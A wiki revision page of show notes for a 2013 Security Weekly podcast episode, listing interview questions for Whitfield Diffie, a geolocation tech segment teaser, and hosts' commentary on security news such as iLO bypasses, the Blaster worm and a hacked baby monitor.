Difference between revisions of "Episode341"

From Security Weekly Wiki
Jump to navigationJump to search
Line 78: Line 78:
==Jack's Stories==
==Jack's Stories==
#[https://www.pcisecuritystandards.org/documents/DSS_and_PA-DSS_Change_Highlights.pdf I'm sorry, really I am] but here it is anyway, the highlights (lowlights?) of the changes in PCI-DSS 3.0.  (link is to 512k, 11 page PDF, because the PCS Council thinks you should trust PDFs).

Revision as of 20:09, 15 August 2013

Episode Media

[MP3 pt1]

[MP3 pt2]


PaulDotCom Security Weekly - Episode 339 for Thursday July 18th, 2013

  • We've released a book on Offensive Countermeasures! Visit tinyurl.com/OCM-Amazon to add this to your summer reading list.
  • We have a special webcast on Thursday August 22nd with Symantec titled "Fighting Malware: Taking Back The Endpoint". We are looking for sponsors for our September webcast. Contact mike -at- hacknaked.tv for details!
  • The Stogie Geeks Show! - Kick some ash with the Stogie Geeks, Thursday nights at 9:00PM EST. Come have a cigar with us! If you are in the Rhode Island area please visit our sponsor the Havana Cigar Club, its an awesome place to have a drink! Make sure you print out your $5.00 off coupon here!

Interview: Dr. Whit Diffie

200px-Whitfield Diffie.png

Dr. Diffie is a pioneer of public-key cryptography and was VP of Information Security and Cryptography at ICANN. He is author of Privacy on the Line: The Politics of Wiretapping and Encryption.

  1. How did you get your start in information security?
  2. It seems like the security field is so broad and can be overwhelming. For people just starting in this industry, where should they focus their time and learning?
  3. What led you to start working on a new crypto algorithm that led to public key cryptography?
  4. Tell us about the genesis for your book and why you wrote it.
  5. Do you think privacy is dead? If not, how can we keep it alive?
  6. What is the Hummingbird algorithm and where would it be optimal?
  7. Are organizations doomed for failure when it comes to security for good, or do you think some day we will be in much better shape?
  8. What do you mean by "A secure internet could not serve our needs"
  9. Why is crime essential to the internet?
  10. How do you think the internet will be different in 100 years?

Five Questions:

  • Three words to describe yourself
  • If you were a serial killer, what would be our weapon of choice?
  • In a game of ass grabby-grabby do you prefer to go first or second?
  • If you wrote a book about yourself, what would the title be?
  • Stranded on a desert island, which tablet would you bring with you if you could choose only one: Android, iPad or Surface?

Tech Segment: I Know Where You Live: Using Honeybadger by John Strand

[Paul: "I noticed we had not yet done a technical segment on this topic yet. There is some really cool technology and techniques for getting someone's location. Exploiting a function in the web browser yields great power!"]

John strand.jpeg


Paul's Stories

  1. HP Integrated Lights-Out authentication bypass - I remember when I saw iLO for the first time. It was at a time when I had a great opportunity to work with a Windows admin who was building an environment from scratch. So, we were getting lots of servers. I was lucky, the admin really wanted to work with me and share knowledge. I looked at the iLO (RILO at the time) and was like "there is no way this is going anywhere else but on its own gated subnet"). Fast forward 10 years, and the vulnerabilities are rampent, including this one. Dan Farmer and HD Moore are publishing huge amounts of research covering IPMI, the protocol being used by these systems. This is one case where I am a huge fan of putting it on a separate network (you get the added benefit of being truly out-of-band depending on how you implement it). I can't stress enough how important it is to keep these up-to-date with firmware too.
  2. 10 years of Blaster: a retrospective - Fantastic article from our friend Robert Graham. Lots of cool little stories and lessons to be learned here. He told the CEO he was taking over in the name of incident response. The vulnerability had exploits written in a matter of hours. It took weeks before there was a worm in the wild. The worm author copied broken code from the Internet (He posted a copy of the original code). Cool stuff.
  3. Buying Battles in the War on Twitter Spam - Great explanation of the Twitter undergound. I find it interesting that no one wants to help solve the problem of email creation. Twitter relied on a unique email address, and evil people will use Hotmail (primarily) to create thousands of email accounts, then a use a botnet to creat the Twitter accounts, then sell them. They are used to spread malware, entice people to sites where ads make them money, and a few other malicious purposes. Comments on this article are funny, people that don't use Twitter still bash it. Don't knock it til you try it! Thing is, for Twitter to grow, they have to take a more aggressive stance on this sort of behavior. They are very "Apple like" when it comes to security problems, very hush hush from a social media network that is all about sharing information.
  4. Schneier on Security: Stories from MI5 - Don't use gerbals as a lie detector test on an airplane to find terrorists.
  5. Can We End CSRF With Header-Based Browser Policies?
  6. The More Things Change - The crux of the article (And ths issue) is in this quote: With all the new technology and the rapid growth of "mass market" cybercrime, it may be easy to overlook one constant: Malware depends on finding a way to install or run on its target without the user's informed consent. And, in 15 years in the industry, I've only seen three fundamental ways for that to happen: exploiting a vulnerability, compromising user credentials, and/or tricking the user. That's it. An entire generation's worth of malware -- tens of millions of variants -- reduced to three simple hacks.. It couldn't be more true! Is there a product that can magically help us? No. Is it all the users fault? Maybe. Can we do better? Yes. Big question is HOW?
  7. Hacker 'Shouts Abuse' Via Foscam Baby Monitoring Camera - This story just gets more messed up: Mr Gilbert said the voice directed offensive, sexualised words at their daughter Allyson, who was asleep in bed. The family believed the hacker was able to call the child by her name because it was spelt out on the bedroom's wall. Turns out the child is deaf. WTF? First, shame on you for picking on a two-year old. Second, you obviously do not have kids as you would know how much parents cherish peacfully sleeping children. Third, you are an asshole. Finally, Foscam and resellers need to do better on informing the consumer. If changing a password is that hard, you need to re-think the usability of your products.
  8. Leap Motion Controller exploit demoed by Malwarebytes - Install this, and move your hand to login to your computer. Awesome! I'd try to make it to that you need to pat your head and rub your belly at the same time to login. That would be fun.
  9. "Every employee is now an IT employee
  10. Wall Of Sheep Hacker Group Exposes NFC's Risks
  11. "Mainframes Hackable
  12. London Bans Smartphone Snooping Garbage Bins

Larry’s Stories

  1. Cam hacked… - [Larry] - So, can you really claim a default password that the user exposed directly to the internet a"hack" or a surprise for that matter. OMG over dramatized scary! But I suppose it takes that to get the word out, but this seems to make them afraid of the technology, not on ways to improve it. The vendor is being chastised for not being able to get patches to the device….uhhhh. And, oh, the irony. The "hacker" who spoke to the child with vulgarity through the camera? She didn't hear you because she's deaf.
  2. Transcend WiFi SD - [Larry] - Run linux. The smaller the device, the less emphasis on security? Could be, in that the web server is a mess, directory traversal, javascript, cleartext passwords, remote code execution, and priv escalation…all in an SD card.
  3. Kali via PXE - I know we had some folks on not that long acou about abusing PXE, and I'm also reminded about Dave Kennedy's tales of abusing PXE (if I recall correctly), now we can just go and abuse it ti get access to a full featured hacking platform…
  4. NSA to cut 90% of it sysadmin roles - [Larry] - Why? humans make mistakes, and by emininating them, we can eliminate the leaks. Besides, we're going to move to a cloud based solution….because THAT's more secure...

Jack's Stories

  1. I'm sorry, really I am but here it is anyway, the highlights (lowlights?) of the changes in PCI-DSS 3.0. (link is to 512k, 11 page PDF, because the PCS Council thinks you should trust PDFs).